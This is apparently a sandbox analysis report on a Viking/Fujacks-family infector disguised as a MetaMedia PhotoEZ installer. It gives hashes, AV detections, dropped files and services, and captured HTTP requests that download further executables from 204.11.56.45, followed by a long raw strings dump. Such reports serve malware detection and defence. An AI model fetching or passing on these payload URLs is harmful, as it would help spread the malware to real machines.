Analysis Date2015-01-26 23:41:59
MD5730bf9f4fc0c95a912ba290a619f6a94
SHA1d2734ecd797220e188021e4548022b876204111b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 28e737a932c2d4837f1546015de59eeb sha1: b52ae3dc2ca39caf259c4d60c67fecae48031f45 size: 36864
Section.rdata md5: e6cf698af3cc1f69e5782e5987459fa3 sha1: f6fd6604ae41c51c700fe64f0e3c0eadf7ab635d size: 8192
Section.data md5: b3dd85dcf070627fa20f1711c69c988b sha1: db3a8a171a198bd505aca28d4b4393d315463539 size: 24576
Section.rsrc md5: 061ab53a69c772eeca3dd1389e111fed sha1: 59e9893416ccbd1daf311804ea182913447f3753 size: 4664832
Section.tcdU md5: b66895d29926164b0057a3dd48630b40 sha1: 2836c3c1de68c0c15897e04e8002b6c832cbe2f1 size: 28672
Timestamp2001-08-01 09:29:15
VersionLegalCopyright: Copyright c 1998
InternalName: install
FileVersion: 1, 0, 0, 1
CompanyName: MetaMedia, Inc.
ProductName: MetaMedia, Inc. install
ProductVersion: 1, 0, 0, 1
FileDescription: install
OriginalFilename: install.exe
PEhash91284e7d2be92098f7dfd62a78609f03f470165e
IMPhash7714c7de6bf8746ebafa2a30fca59ca9
AV360 SafeVirus.Win32.Agent.O
AVAd-AwareWin32.Viking.AR
AVAlwil (avast)Crypt-RPT [Trj]
AVArcabit (arcavir)Win32.Viking.AR
AVAuthentiumW32/Viking.A.gen!Eldorado
AVAvira (antivir)W32/Fujacks.DR
AVBullGuardWin32.Viking.AR
AVCA (E-Trust Ino)Win32/Viking.D
AVCAT (quickheal)W32.Agent.DP
AVClamAVWorm.Fujack-55
AVDr. WebWin32.HLLW.Autoruner.8224
AVEmsisoftWin32.Viking.AR
AVEset (nod32)Win32/Agent.DP virus
AVFortinetW32/Fujacks.BF!tr
AVFrisk (f-prot)W32/Viking.A.gen!Eldorado
AVF-SecureWin32.Viking.AR
AVGrisoft (avg)Win32/Fujacks.S
AVIkarusTrojan-Downloader.Win32.Jadtre
AVK7Virus ( 00108a531 )
AVKasperskyVirus.Win32.Agent.dp
AVMalwareBytesno_virus
AVMcafeeW32/Fujacks.ay
AVMicrosoft Security EssentialsVirus:Win32/Viking.NK
AVMicroWorld (escan)Win32.Viking.AR
AVRisingWin32.Agent.hn
AVSophosW32/FuzVir-A
AVSymantecW32.Loorp.A!inf
AVTrend MicroPE_JEEFO.D
AVVirusBlokAda (vba32)Virus.Win32.Koklek

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\2c34_appcompat.txt
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe
Creates ProcessC:\WINDOWS\system32\dwwin.exe -x -s 188
Creates ProcessC:\WINDOWS\system32\drwtsn32 -p 1368 -e 144 -g
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"

Creates FileC:\WINDOWS\system32\dllcache\lsasvc.dll
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\Expor.exe

Creates FilePIPE\SfcApi
Creates FilePIPE\wkssvc
Creates FileC:\WINDOWS\system32\qmgr.dll
Creates FileC:\WINDOWS\system32\mspmsnsv.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\Loopt.bat"
Starts ServiceWmdmPmSN

Process
↳ C:\WINDOWS\system32\dwwin.exe -x -s 188

Process
↳ C:\WINDOWS\system32\drwtsn32 -p 1368 -e 144 -g

Process
↳ C:\WINDOWS\system32\svchost.exe

Process
↳ Pid 820

Process
↳ Pid 864

Process
↳ C:\WINDOWS\System32\svchost.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WmdmPmSN\Start ➝
2
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\48T8SZZG\desktop.ini
Creates FileNtHid
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\WINDOWS\system32\WBEM\Repository\$WinMgmt.CFG
Creates FileC:\Documents and Settings\NetworkService\Cookies\index.dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\NetworkService\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\30PVTMA8\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\I7I7SHMJ\desktop.ini
Creates FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\O123STIV\desktop.ini
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\TEMP\NtHid.sys
Creates FileC:\WINDOWS\system32\WBEM\Logs\wbemess.log
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\desktop.ini
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\IIQ3LGTM\desktop.ini
Deletes FileC:\WINDOWS\TEMP\NtHid.sys
Deletes FileC:\Documents and Settings\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\desktop.ini
Creates Mutexc:!documents and settings!networkservice!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!networkservice!cookies!
Creates Mutexc:!documents and settings!networkservice!local settings!temporary internet files!content.ie5!
Creates ServiceNtHid - C:\WINDOWS\TEMP\NtHid.sys
Winsock DNS204.11.56.45
Winsock DNSwww.490a-B8B5-9B8C1E870B0C.com
Winsock DNSwww.baidu.com
Winsock DNSpc1.114central.com

Process
↳ Pid 1220

Process
↳ C:\WINDOWS\system32\spoolsv.exe

RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\BeepEnabled ➝
NULL
RegistryHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\Print\TypesSupported ➝
7
RegistryHKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Print\Printers\SymbolicLinkValue ➝
NULL
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Print\Printers\DefaultSpoolDirectory ➝
C:\WINDOWS\System32\spool\PRINTERS\\x00

Process
↳ Pid 1888

Process
↳ Pid 1180

Network Details:

DNSwww.a.shifen.com
Type: A
180.76.3.151
DNSpc1.114central.com
Type: A
204.11.56.45
DNSnbtj.114anhui.com
Type: A
DNSwww.baidu.com
Type: A
DNSwww.490a-B8B5-9B8C1E870B0C.com
Type: A
HTTP GEThttp://204.11.56.45/ko/01.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/ko/02.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://204.11.56.45/ko/03.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1033 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1034 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1035 ➝ 204.11.56.45:80

Raw Pcap
0x00000000 (00000)   47455420 2f6b6f2f 30312e65 78652048   GET /ko/01.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30322e65 78652048   GET /ko/02.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....

0x00000000 (00000)   47455420 2f6b6f2f 30332e65 78652048   GET /ko/03.exe H
0x00000010 (00016)   5454502f 312e300d 0a416363 6570743a   TTP/1.0..Accept:
0x00000020 (00032)   202a2f2a 0d0a5573 65722d41 67656e74    */*..User-Agent
0x00000030 (00048)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000040 (00064)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000050 (00080)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000060 (00096)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x00000070 (00112)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x00000080 (00128)   6f73743a 20323034 2e31312e 35362e34   ost: 204.11.56.4
0x00000090 (00144)   350d0a43 6f6e6e65 6374696f 6e3a204b   5..Connection: K
0x000000a0 (00160)   6565702d 416c6976 650d0a0d 0a         eep-Alive....


Strings
000,000,000,000 bytes
040404b0
1, 0, 0, 1
A|ALA<A
Abort
All rights reserved
Application
A tool for image management and processing
Auto run
Browse
Browse...
Cancel
CHANGE_DIR
Choose Directory
CompanyName
Control Panel
COPY_FILES
Copy files to : 
Copyright 1997,  Meta Media Inc.
Copyright c 1998
C:\PHOTOEZ
Create Group :
DIR0
DIR1
Disk drive:
Exit
FILE
FileDescription
FileVersion
Free disk space:
GET_DIR
         (((((                  H
HAND
Help
ICON
IDD_COMPLETE	GET_GROUP
install
Installation options
Installation V1.1
INSTALL-DOWN
install.exe
INSTALL-LIGHT
INSTALL-NODRIVER
INSTALL-UP
INST_PHOTOEZ
INST-UP(DEXTRA)
InternalName
LegalCopyright
MetaMedia, Inc.
MetaMedia, Inc. install
msctls_progress32
OPTIONS_PHOTOEZ
OriginalFilename
PhotoEZ
PhotoEZ is installed properly on your harddisk.
Please enter the directory you want to keep this software.
Please enter the name you want to specify this software.
ProductName
ProductVersion
Program group
Progress1
Progress2
Reproduction of this software and its document is prohibited.
Start menu
StringFileInfo
System
SysTreeView32
The destination directory for installation
This software is protected by the international treaty.
TOTAL
Total space required:
Translation
Tree1
VarFileInfo
Version 1.2
VS_VERSION_INFO
w[&,
<} <|"=}!<|
|<;}=<}=<}=<}=<
|||\\\
 -',  &
 '"!$ 
 '#"$ 
 $""&!"&"!%! $
 &!"'"#'"#)%$-)(-('(#  
 &!"(#$'"#$ 
 &!"(#$$ 
 &!"(#$%! $ 
 &!")$%/*++'&+'&(%!
 &!")$%.)*+'&+'&(%!
 # "$!#
 #!#$"!"
-)((%!
-##,""#
-##,""%
,+')-(
;~ <}"=} ;{
! $%$(
!;#"?%
!!!}}}
!'!",'&*%$
!)(%.<&*<
!$""$""$!#"""#"
!&"'("'&
!%##$""$!#"""#"
?(|:!|;
?(};"|;
?#~=!}:
/,(+($(("&#
/,(+($*'"&#
/' (,  "
/' (,  #
'!"(#%#
'!"*%&,'(% !#
'"!&"!!
'"#% !!
'($+,(+,($(#$%#"#!
'$ *'#%$   
'$ *'#%$ !!
'#"(#$'"#$"! 
'#")%$!
'#")%$"
'%$,,,!##
'%$### !
"<$"?%
" $%#-.,*+))*("%#
" &*% $
" &*%!% 
" %&$---*+)'*("&!
"""'''$"! !
"""&&&$"!!" 
"#!'%$&'%" 
"#!%&$&'%" 
("'" &
("#%&$'$ &"
($#/+*!
($#'#")%$'%$($#$ 
($#($#*&%)%$'#"#
($#($#&#
($#)$!'#
($#+&%*""'"!,('(&%&"!#
($#+&%*""'"!,('#!  
(#")$#!
(#"&"!"
(#%$"(
(#%#!'
)"  %&$&'#%&$*&%*%$*%$'#")
)"  %&$%)$%(&(&%+&%*%$'#"'
)$!*&!("
)#!!%&$%)$$'%)'&,'&*%$(#"-$ %!
)#!!%&$%)$$'%)'&,'&*%$(#"'
)%$+,*!$"
{;:|<;}=<}=<}=<}=<
@,{?)~@(
@"!;" ;&$>%#:$
@*$<.(>+(
@*$;-'=*%
@*$:.(;*';-'<.(@*$@'
$""! $
$&' !+
$%!+++"""
*"#)!!%
*&%)'&######$$$"""!
*%')$%% !'"#'"#&!"($#-)(-('(# 
*%"(#" 
*%"(#"!
*%"+'"'!
*%$,&' 
*%$+&'
*%&*%&&"!"
*%&*%&% !"
& !+(%.#
&!",)&/#
&!")$%,'(% !#
&!"&!"#
&!"% !!
&'#+-'(,'$(#$%#"#! !
&$#+&%+##'"!*('$ 
&%!&& $ 
#! "#! #!'*(&*%&*
% !&!"(#$'"#$ 
% !&!"% !&"!($#*%$#
% !&!"%! '#")$#*%$#
% !%! '#")$!'#
%! '#"(#$'"#%! !
%! '#"&"!# 
%! )%$$!
%! $"!"#!'*(&*%$+
%! &! !
%! #! 
%! %! &! !
%! %#""#!
%#"+%&*""(#"+'&%
%##$#' 
%##&"' 
+.%'%$ 
+.%('# 
+*&*.)
+&'(&%"#!$%#$%#"#! 
+&()$%$
 &!"&!"(#$*%&'#"0,+)&"
($#0,+!
*# 0*#$#
*%$*%$+$!.%"0'#,# &
&%?#0^$/[
+&%*%$+$!.%"0'#,""%
*# 0%!0'
#$ (,'+.,+.,)*('(&%'''))***000()'%#"% !#
000hhh
 0+020e0k0
$+ *0$03&44(41'32'79.B;3Q92U4-X3,Y+
0,0A0^0s0
!% '*(-0.,-+*+),,&+,#0-(DA=A?>?=<865/-,3/.3./3.//*+% !'"#*&%*&%'#"%! $ 
#$"&'%)'&0.-1-,,'&'
 '"'013=
0(!-)$-'"1&"3( 9*!4"
.+'.*)+'&0+*1))>52D::G;;H<<>01@23F89@23.%!&
@01B-/NDDYTSg_`ncf{ps
&"!-)(,('0+*1,+C>=OEERFFTHHXJK[MNYMKSGE3*''!
%! )%$0+*-%%1))QIIdXX`PQTECD53A209-)/#
 % !'"#*%&0+,2-.2.-=982/+
% !'"#*%&0+,2-.2.-=9830,
0[!2] 3Y"5Z)=`)<a,?e(>b(>b,?d+>c.Ad-@a-?^DTqXf
)%$(#$'#(%&024?JLWEJY=GXLSfZarls
.* 02+:.&7(
$$#,02<JLVTYbGMT]_i
0(\2-Q5*V6)X8-]:0gD7mI9{UC
" !&$()'./-03147556212../+32.::4FEAECB20//-,%#"#! %##*&%+'&$ 
/* 03+<54H:9S:9[?>fBAmGEsHEvMJ{DEq;:d76b98bA?iNMwZ[}CDY@AKFGC9A0.@#0@!8@!5>
-- ..!/0#35)=5(>2%?7)E:-S7-X3*\4*Y)
03$&9*'J6&`H$~`"
)=%0>*3A).= "431Gmn
);%0>*3A).= "442Hmn
'#"-)(,('0+*3++D?>OEESGGTHHXJK[MNYMKSGE3*''!
.!#;03HBFYY\qlq
!!"&+*.0/3=<@JIMJIMNMOOKPJFKIEJJGIMKKLJJ_]]UUUa__hgiIHLhgpbak117'(,&$**)-.,25.54-42,1413B@@?==
!!"&+*.0/3=<@KJNJIKONPPLQKGLIEJJGIMKKKIH_]]TTTa__hgiIHLjgpbak117'(,&$**(.0,25.54-42,1524B@@@>>
<0\>3nI5
(03OY\{hk
("'0/4=
>04=47G>AWNQh[]ydc
0(+:47ECFT9?L
0]!4_)=f.Dh0Fi@Xv?Uq?VpE[tI]vK\vH]xH\uN_ySczXh
<+.>04L@F^PVlZY
<+/?04M?E^PVj[Y
'04MY\{hk
,<$05 (
$"()&/)$-.&0*#*'!&)$&5023./
*#&)$&)$&(#$*&%+'&,('.*)0,+5103/.%! 
$"!))#0/+532:::333.,+20/945945501*%&*%&% !#
))#0/+532<::533.,+40/9459454/0)$%*%&% !"
!" 053pyv
(; 06#'
)<!06#'
$"()&/'$-.&0*#*'!&)$&6124/0
(#$0),612502C>@A<><79:56703B>=OJIA995--/'',$$)!!%
!(06=DJOBFK=BE>CFQVWjmqhlmIMNAEFCHG=B@=B@Y^\
0),7+1K9@hTS~ge
07(2H6%YA&rS#
08101BB
%! *%&0+,/)**%&% !835946/*+4/05/0D@?YUTSNMIAAE@??:9;763/.;76-)("
08!:D-;A0-'"J>Dudo
08!:D-;A0-'"K?Euep
*((/,.0.-;<:>?=;988662-.,('+'&.,+><<DBB723-()>9:823%
$+%0&$A$-_
:,0aLJx]S~^QzYJ{YB
:,0aLKx]S~^QyXI{YB
\0)b=9J61(
0B%;E.)"
0"b;-TB7Q;/T;'ZA-fH5pO<yYB
[0!cD5\K>?4,"
] 0~CR
\ 0{CR
+\"0d$3d(8f"4]1Fl6Lo%9\
0[d4eo;hu7gs=my<mw:hs3`k'V^(RW
0[d5cn;hu7gs=my<lx:hs3`k(V^*QY
0[d6do;hu7gs=my<mw:hs3`k(V^(RW
>0{D7xG=kD<b>6^>1dD9nG>|L@{B3{?3
] 0}DR
0',E2<Z9DdQ]
0',E4<Y;DeQ]
`=0eA1zD9
0F4S]MeaQibPgbRil\s|l~
0F4S]MebRjcQhdRil\s|l~
=0(<)$G71T>8
=0(>*%G71U@8
;/\0)g?-zM8
0j/0@0E0R0f0
0_*;l1?s2Ay1C~1F
0L#:T$5O5D^9Kb+>Y$9U
0<l#,X18cgo
0m%4l$'C
0m&6k%(D
0 !nE/
0O>1_H9uZF
0O"2W$6[&7^!1[
0 !oE2
0?p$5m,9q,9q*:o$4i
@0)R50eGB}WR
>0<RK`VQlVPoXRuXPx\O{\Pz^V
.0*R\V
0sl!vr5
	0%,Sw|
0T0X0\0`0d0h0l0p0t0x0|
>0<TK`WSlVPoYTtXPx\O{^Pz_W
.0*T[V
0VA9jTI
.0*X_Z
0) >,%YH?{aS
%%=#0^#.Z
[ 0zCR
=('@+):%#1
,# 1$"%
($#+))-()1-,+'&($#)$%)$%&!"$ 
)$%*%&/*+1,-,'(%
)$%+&'/*+1,--'(%
)%$+))-()1-,+'&($#)$%)$%&!"$ 
*# 1+&$#
&$#%)$$%!%)$.1/(+)%(&#'"#'" $
1><"'*)+,%$.!
*")10@+0E-0E22J25J/2G./C)%8,"3&
-#)10@,1F/8L-8L-:P.9M07J68J55C7&4*
+&'1,-/*+0+,3./501834945B<=C;;C99F<<@74;2/7.+3''4(('
+&'1,-/*+0+,3./501834945C;<B:;C8:F<<B66:1.6-*0&&4(('
(+).1/-.,*+'*,&*+"0-(BA=A?>?=<865/-,3/.3./3/./+*%! '#")%$*&%&"!%"
(&%$"""  #$"&'%*('1/.1-,+'&'
=11=11<!
)$%*%&.,,111///222...,**2-.C?>UPOLDD800.&'+#$'
!% #'"%&$#$"%&$''''*(*+)1115646441,-2-.A<>F?B<79/*+#
&&&111*+))'&*%&+&(-(*-(*7244/1"  $""$""%! %! $
1 +1%9A5QLEhLDlFBlFCpKHuKHuLIwVS
)#.11A(*<#%7
11+]d_
1<1S`AdrAdq@dnDfsAdr:]jDgqc
1<1S`BesAdq@dnDfsAdr:]jDgqc
11+SXV
%11Ufcp
11vIFKHDSMHUSIXPQ_XU_VR`TN_VM`SK^PJ^PJcPH[OC[K>\I<^NAaOD^J?]I>ZGBYLDYNFWMFXLF]OI\LFWFCOC?PGCQKFJEDNFGICDOGGKFEKFEPLKRPOOOOPRRPRRQSSUWWWXVUXVWZXVYWUVTXST\VWZQTVPQ]XY^YZ^VV\TT`XX^VW`UX^SUaTVeWXdTUfXYg]]g]]bVV`TPcQPdOQ`LKcQPbSQiWXjUWfQPgTQiXUkWRjTNfSKiSMjZSjZSlYQoZRubZue^xf_|ib{h`wbZr\Qs\Mt]NzdY|cYx\QsVG
%&$+)(1/.20/12023101/-.,.,+/-,40/9546010*+601-()(#$("#,'('"##
120>?=586%&$#$"$$$###"#!555B@@><;976755724E@B>8==7<D>C849A@DA@B*)+(((,,,-++-())$%+&'3-.5--@883.+
12.<@;586%&$#$"$$$%#"$"!444B@@><;976755612F?B>8==7<D>C849A@DA@B*)+(((+++-++-()*%'+&'2,-5--@884/.
-+!12+:-%6(
12.elg
/+!13+<54H:9S:9[>>fBAmGEsGDuLIzDFo:9c76b98dA@lNMyZZ~EB[@AKFGC9A0.@#0@!8@!5>
###!##&)'.1/364142./-)*&%$ "!
>13>67F@AUNSf[]xeb~d^
1 +3$9?6QLEhKFmFBlGDqJGtKHuLIwVR
%/@*1@39F99G84?@8BG;AE:<I<:M71O9.W=/]?.`?+hB*i?"p@
!,13=cfn?FO!$,OEE
!,13=cfn@GP"%-OEE
1` 3^)=f.Dg";[2Jh3Ki7Mi:Pl<Nm>Mm<Nk=NiESoHWqVf}[l
1!"3#$?&$H)&fA9
@1`=3i?2yC8
 13:IZar
1;!3N7MVAZ`OpgZ
>13V?AdGKnPTwTZ}en
" !&$()',/-14247536412../+32.::4FEAECB20//-,%#"#! %##*&%+'&$ 
)"%)$&)$&(#$+'&*&%,'(.)*1-,5103/.%! 
1*-5+1L:AhUR
@15X?EhGMpOUxU^
!" 164pyv
/)$.*%1)"6("J=5
&!"*%&(#$'"#1,-712=78G?@J?AKAANDDC:7@74?31>66+##)!!(# ($#($#&#
,& 1($7+%6+'3$!1%"2-+>NL_zx
1&"-$ *%"768>;K85E77G38G/6G.5H3:M6<O37J3.=1$,:%'9!#4!$0#+.$1+ 4.#=3$@7"B8)I9+M3,O:2W81V5/R74[>:d=>j9Ai=Em;?h68a,.W.-T35W46X43U25[,7]%1Y-7_9CeNMoZWwbd
&%!'$#,"#1%(7&)7$+4
!(17>DJOBFK=BE>CFQVWilphkoIMNAFECHF=B@=B@Y^]
&!"*%&(#$'"#1,-823@89G?@J?AKAAPDDC99@74=41=55+##)!!'"
,<1A6+;(
,<1A6+;)
1Ao,=n7D|>H
1bl(Zf+[g/\i8dqEjxEerD_mD^jH`l9O[
*<#1C!0@ '8><Ppq
[1$eH9WG:2+"
1=>=F=
]1$f2&{>0
1f"2g"0a *`
:1G1P1]1
1g#;q%=s
1hu2fv2cs/[l/Zk6`s5`u.`t,_s1eu:o|<r}5nw2ju>t
1hu2gt2cs/[l/Zk5ar4av.`t,_s1eu:o|<r}7nw2ju>t
_1)i<1g=0V0$jJE
&"!1,-.)*&!"($#'"#&"!'"#/)*IAARJJLBBH>>;/->20J><9--0$"-$!(!
'#"1,-.)*&!"($#'"#&"!'"#.)*IABRJJMCCK??<00=41I??:..1%#.%")"
1[ =i%Fx'H
$$#,/1;JLVVXbGMT^`j
1K1Z1h1
\<1kD6{J:
1^*;l1?s2Ay1C~2G
1l!4m#5j$6k%6n%6n$9m#8k&:j';j&<l%<n#<n ;n =p
1n!4m#4l#4l%6n&7o%:n#8k(9j';j(<l%<n#<n ;n =p
1n(5i"$< 
1n)6j!#; 
1?p$5m,9q-8q,:o#3h
/1+SXV
=1V6+lI?tB6
_1)vH=
1W'NVYc8uj
1?y5C~3B
1Z!3\#8^+Cg'=a'=a/Ei*Bf.Dg,Cc,A`2Fe0Ea/A^2C^7F`BPgBPcHTfFScQ_q[ewco
!& !'!"(#$.)*2.-/+*%"
?%?2?]?
'#"2.--*&&#
"'!"("#.)*2.-/+*%"
2/+-)(&$$
2/++)(&$$
'%$$(#$%!%)$/20(,'%)$$(##'" #!
 2000-2001, 
%&$+)(20020/120031.1/---.,+1-,40/954501/*+501-()(#$'"#,'('"#"
'#"2.--*&'$ .+'.*)+'&0+*1))>52D::G;;I;<>01>22E99@23.%!'
#$" ""&)'/20364142./-)*(%$ ""
$2	0oSn
]2!\?0VC6C:1& 
2@(.1!(
2@(12"(
#$"*+),,,---213102(((0/1333LJJEEE888EEEGFHONPQTXKNR?BGhkoehl134)+,)+,+*.-).;5:<6;=8:=89EA@954
#$"*+),,,---213102(')0/1533LJJGEE888EDFGFHONPQTXKNR?BGhkoehl134)+,)+,+*.-).:49<6;=8:=89EA@954
2&"1%#4((3&(0%'-%%2**9344./)$&($)HFLbcgafibhmcipZhn_rzg}
^:2_;1mC7
&!"-()2,-2-.0+,:567240+-7123-.B<=[UVLDEA68G==2**'
&!",'(2,-2-.0+,:567240+-7123-.B=<\VWLDE?78G==4**) 
2(2B2N2W2c2n
2<2Q{h2p2
&22Tebp
2 !3!"2"#.
)#$+##.&&2)&3*',$$(  ,&'+&''#(*)202=?ALADR7@M9>MZ]k
2@{3A{1?y9E
2 !3#$=$"D%"c>6
23/gqk
2?3H3Q
2& 4)!9-!?,
2[$4b#4_%7`$6_
)%$(#$'#('&/24?JLWEJY=GXLSfZarls
!259K\`r
259SXVNURnwt
259SXVOVSmvs
!25:IZar
25} uN
%# )#$.!$2%(6$*7%+8 #1
 *$()267bgh
2(+:67EBES9?L
2[%6a#4_"6_$6_
2,-;76TONtfg
2,-;76VNNtfh
#%!'"#-#$2%(7&)7$*5
2!%7!&F27YCHgRZj_iqfpyms
283QVVy}s
.  288J``r
2?'8A,'&
]2)<)$:-%8,&=.+D7/Q<4YC8dH=vTG
29A^eUouA[a7QW6OS=RSx
29A^eUovC[a9QW6OQ<TTw
29@]dUouD\b7QW5NR;SSx
29j (]"+d%/e(3g&1e#0d"0d#1e-;o:Iz@O}=Jx8Fp8Dl5Cg>JlHTvR^
2.9&!#p[S
>2a<4c?7ySG
2a%9p':w(A
2A%;E.+#
*<#2B#0@!(9><Prq
2b%9p':w(A
2Bp+<m7D|>H
2D2J2O2U2b1n2t2
2])>d)>d>TwKa}3Ib<Th;Se=SeAUgATi@ShAReGXkGViKZmVexTbtUcv]k~lz
.\!2]+>d+>d>TwKa}3Ib<Th;Se;Se@VhATiATiAReHYlGViKZmVexTbtTcv\l}k{
2:(E:+K<-M8+K=0V<4]A;d6=d/BeD[uQn|QpsZuqawrdwtbtubqtbmujo~
2e&;o'<s#;q#;q"<r
>2>E>S>\>s>
[2#f3#
+2F'5_'1S
+2F'5_(2T
"" &$#''(,+.2fkn
2Gc/A^1?\:EcDMnCLmLUvKTuALl=Hh;FfALl9Hi>JlKWyHRt>Hj4>`08]AInSZ
2Gc/A^1?\:EeDMnCLmLUvKTuALl=Hh;Ff?Ll;Gi>JlKWyFRt>Hj4>`09[AJlSZ
$,!'@2&`H#
"[(2h"-a
2h#;q%=q
,2I#&.7;<>FF7<=4985:8364333054.34
]=2iA5{J<
2[i?L<5M<9SC=\ECcMHlSQt[W
%2(-<JO^vz
2K2f2v2
2k#5j%'J 
2k#5j$(K
%2).=KP_vz
_2q^!k
2T2d2{2
\2%uWLi[O81(
`2*vG?
2X!4Z#6["7d!8e&6a#-\
2XA9iOC
2@z3C~4C
2;z*9{)D
2]zCW@8jOE
2<Z/;W)6P(3N*7Q#2L(9T/<V.9T2=X0;V.9U8>[:>Z4@\2=[0;Y3>\3A^<IiKWyKUwFTxFSyHQwOV}QY~]e
2<Z/:X)6P(3N*7Q#2L):U/<V/:U2=X/:U.9U8>[;?[4@\2=[0;Y3>\4B_=JjKWyKUwCSwGTzIRxMV|QY~]e
%!-$#3'
3\0Fj4Kk(?_#<^)@f,Ci-Dj.Ci-Bh/Ei1Eh0Cd2Dc5Eb5Fa?NhIWnQ_uVdwZh{Zhz[j}]k~_n
3>0@P>O\>P[BU]OahUelVdjS_cO[_DQSCPRQ^`]kjR`_Sa_O\ZVd`mxvlttV]`
[3!\?0VC6E:2& 
30zC6F2'L:/^E;tYK
"#!#$"+,*3101-,-)(5107//1,+#
#$ (,'+.,+.,*+)()'%'''))***311)*(%#"% !#
)%$*%&.,,3111//4220..,**2-.C?>TPOLDD800.&'+#$'
("#311444222ECCA??C@BEBD405548215635B=?FDDHFFHFF|||
 3.1 (16 
("#311644422ECCA??CAAEBD405548213635C>@HCDHFFHFF~||
+'&311;67@<;422+))+))*(('%%'%%A=<_[ZxsrtllWLNI>@UJLC8:>35?:9/*)#
3,177G64G13E06I/9K(3G(2D35G<4E6*6/"*0$*/$,-$1+%6/(=/&@.#D/#G1&L0,U+1Z&2\/;e6=h79a99a98b32Z1)R0(P/+O21S40Z/1Y/8^(6`+8d2;g;CkKTvY_
 3-1D8>Q(/@
